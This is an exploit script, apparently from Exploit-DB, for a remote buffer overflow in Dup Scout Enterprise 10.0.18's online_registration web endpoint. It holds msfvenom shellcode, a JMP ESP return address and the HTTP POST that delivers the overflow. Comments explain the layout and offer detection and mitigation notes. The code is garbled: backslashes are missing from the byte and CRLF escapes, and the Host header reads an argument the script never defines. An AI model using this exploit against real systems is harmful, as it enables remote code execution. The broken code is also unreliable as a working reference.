Authored by sickness, Tulpa, 0rbz_

Dup Scout Enterprise version 10.0.18 suffers from a remote buffer overflow vulnerability.

# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
# Requires the target's web service to be enabled.
# Tested on Windows 10 Pro (x64)
# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
# Credits: Tulpa and SICKNESS for original exploits
# Modified: @0rbz_

import socket,os,time,struct,argparse,sys

# Proof-of-concept request generator for the advisory above: builds one
# oversized POST to the web service's registration endpoint, sends it over a
# single TCP connection, and exits without reading a response.  Written for
# Python 2 (print statement, str-based socket send).
parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()

# The only CLI option is the target host; the port is fixed to 80, i.e. the
# product's web service (see the "Requires ... web service" note in the header).
host = args.host
port = 80

# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "x00x0ax0dx25x26x2bx3d" -f py

# Payload body as produced by the msfvenom command above (CMD=calc.exe).
buf = ""
buf += "xb8xa0xa1xfdx38xd9xf7xd9x74x24xf4x5ax31"
buf += "xc9xb1x31x31x42x13x83xc2x04x03x42xafx43"
buf += "x08xc4x47x01xf3x35x97x66x7dxd0xa6xa6x19"
buf += "x90x98x16x69xf4x14xdcx3fxedxafx90x97x02"
buf += "x18x1excex2dx99x33x32x2fx19x4ex67x8fx20"
buf += "x81x7axcex65xfcx77x82x3ex8ax2ax33x4bxc6"
buf += "xf6xb8x07xc6x7ex5cxdfxe9xafxf3x54xb0x6f"
buf += "xf5xb9xc8x39xedxdexf5xf0x86x14x81x02x4f"
buf += "x65x6axa8xaex4ax99xb0xf7x6cx42xc7x01x8f"
buf += "xffxd0xd5xf2xdbx55xcex54xafxcex2ax65x7c"
buf += "x88xb9x69xc9xdexe6x6dxccx33x9dx89x45xb2"
buf += "x72x18x1dx91x56x41xc5xb8xcfx2fxa8xc5x10"
buf += "x90x15x60x5ax3cx41x19x01x2ax94xafx3fx18"
buf += "x96xafx3fx0cxffx9exb4xc3x78x1fx1fxa0x77"
buf += "x55x02x80x1fx30xd6x91x7dxc3x0cxd5x7bx40"
buf += "xa5xa5x7fx58xccxa0xc4xdex3cxd8x55x8bx42"
buf += "x4fx55x9ex20x0exc5x42x89xb5x6dxe0xd5"

# Overflow buffer layout: 260 bytes of filler, a 4-byte little-endian address
# (annotated by the authors as JMP ESP in libspp), a short run of filler, the
# payload, then padding so the whole field is exactly 10000 bytes long.  The
# fixed 10000-byte field length is the observable the exploit depends on.
buffer = "x41" * 260
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "x90" * 20
buffer += buf
buffer += "x90" * (10000 - len(buffer))

# The HTTP request: a POST to /online_registration whose customer_name and
# unlock_key form fields each carry the 10000-byte buffer, with a declared
# Content-Length of 17000.  Detection note: a registration request whose body
# is orders of magnitude larger than a real customer name / unlock key, or
# whose declared Content-Length does not match the body, is a strong indicator
# of this attempt; the path and both field names are fixed in this script.
evil = "POST /online_registration HTTP/1.1rn"
evil += "Host: " + sys.argv[2] +"rn"
evil += "User-Agent: Mozilla/5.0rn"
evil += "Connection: closern"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
evil += "Accept-Language: en-us,en;q=0.5rn"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
evil += "Keep-Alive: 300rn"
evil += "Proxy-Connection: keep-alivern"
evil += "Content-Type: application/x-www-form-urlencodedrn"
evil += "Content-Length: 17000rnrn"
evil += "customer_name=" + buffer
evil += "&unlock_key=" + buffer + "rn"

# Delivery: one TCP connection, one send(), then close.  Nothing is read back,
# so the script cannot tell whether the request was accepted or the service
# crashed; the "Payload Sent!" message only means the bytes left the socket.
# Exposure requires the web service to be enabled (header note), so disabling
# it or restricting access to port 80 removes the attack surface.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()